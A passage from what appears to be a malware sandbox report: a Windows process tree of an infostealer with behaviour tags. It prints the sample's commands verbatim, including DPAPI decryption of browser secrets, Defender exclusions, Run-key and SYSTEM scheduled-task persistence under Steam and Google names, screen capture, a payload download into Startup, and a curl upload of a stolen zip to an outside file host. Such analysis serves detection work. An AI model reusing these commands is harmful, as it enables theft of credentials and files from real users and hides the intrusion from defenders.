123,195,86,100,93,247,64,252,117,239,146,183,104,157), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,20,29,26,98,64,44,226,214,150,140,5,93,9,205,157,159,142,9,7,42,55,240,110,187,23,162,197,9,239,20,46,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,187,82,227,91,150,150,10,73,155,252,195,239,145,62,190,145,28,48,233,205,131,115,209,185,225,150,206,173,252,73,23,0,48,0,0,0,55,32,18,46,197,59,107,47,89,116,117,185,66,233,212,221,74,21,152,12,51,238,20,40,9,173,78,120,242,64,7,86,235,65,242,114,115,156,18,65,86,66,251,152,179,54,32,45,64,0,0,0,99,246,183,155,42,60,223,219,232,128,240,225,213,68,124,100,113,0,228,185,135,178,112,127,159,177,22,200,242,183,134,29,223,162,60,116,168,153,158,193,120,62,40,23,107,206,25,85,46,230,94,142,143,13,74,105,180,61,20,0,122,6,4,110), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,20,29,26,98,64,44,226,214,150,140,5,93,9,205,157,159,142,9,7,42,55,240,110,187,23,162,197,9,239,20,46,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,187,82,227,91,150,150,10,73,155,252,195,239,145,62,190,145,28,48,233,205,131,115,209,185,225,150,206,173,252,73,23,0,48,0,0,0,55,32,18,46,197,59,107,47,89,116,117,185,66,233,212,221,74,21,152,12,51,238,20,40,9,173,78,120,242,64,7,86,235,65,242,114,115,156,18,65,86,66,251,152,179,54,32,45,64,0,0,0,99,246,183,155,42,60,223,219,232,128,240,225,213,68,124,100,113,0,228,185,135,178,112,127,159,177,22,200,242,183,134,29,223,162,60,116,168,153,158,193,120,62,40,23,107,206,25,85,46,230,94,142,143,13,74,105,180,61,20,0,122,6,4,110), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"2⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber3⤵
- Suspicious use of AdjustPrivilegeToken
PID:68
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"2⤵
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f3⤵PID:1976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"2⤵
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM3⤵
- Scheduled Task/Job: Scheduled Task
PID:3824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""2⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:1620 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fztpdle2\fztpdle2.cmdline"4⤵PID:720
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99A0.tmp" "c:\Users\Admin\AppData\Local\Temp\fztpdle2\CSCED27ED56003450AB6A0C9D81CFCD6D3.TMP"5⤵PID:1408
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""2⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"3⤵
- Checks computer location settings
PID:4180 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "4⤵PID:1628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2328
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Setup.exe" /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:8
-
-
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"5⤵
- Modifies registry key
PID:3096
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE5⤵PID:4552
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"2⤵
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber3⤵PID:2348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3808
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"2⤵PID:4884
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵PID:456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3292
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:2564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"2⤵PID:2892
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID3⤵PID:3928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"2⤵PID:4468
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber3⤵PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4756
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:2708
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"2⤵PID:3684
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid3⤵PID:68
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4100
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"2⤵PID:1660
-
C:\Windows\system32\getmac.exegetmac /NH3⤵PID:3772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1252
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:1056
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:3304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4352
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:4736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1400
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:3576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3952
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:3732
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:880
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:1448
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:2772
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1940
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:4812
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:796
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4272
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4144
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1116
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3664
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:4004
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2192
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:2544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2564
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""2⤵PID:2628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Sxacgpin.zip";"2⤵PID:3824
-
C:\Windows\system32\curl.execurl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Sxacgpin.zip";3⤵PID:1908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:232
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1044
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:1452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2408
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2384
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:5008
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:2028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:2312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4144
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1716
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:652
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2544
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4808
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:668
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4048
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:1260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:924
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2328
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:540
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4120
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1044
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""2⤵PID:1608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:404
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:4744
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3720
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:892
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4928
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:1956
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:3824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1552
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2892
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4660
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:3676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4848
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:232
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2716
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:3900
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:996
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:2708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4128
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:5108
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:1348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2104
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:2288
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:1116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:3576
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:1180
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:1908
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:4716
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:844
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:636
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4004
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:3548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:1804
-
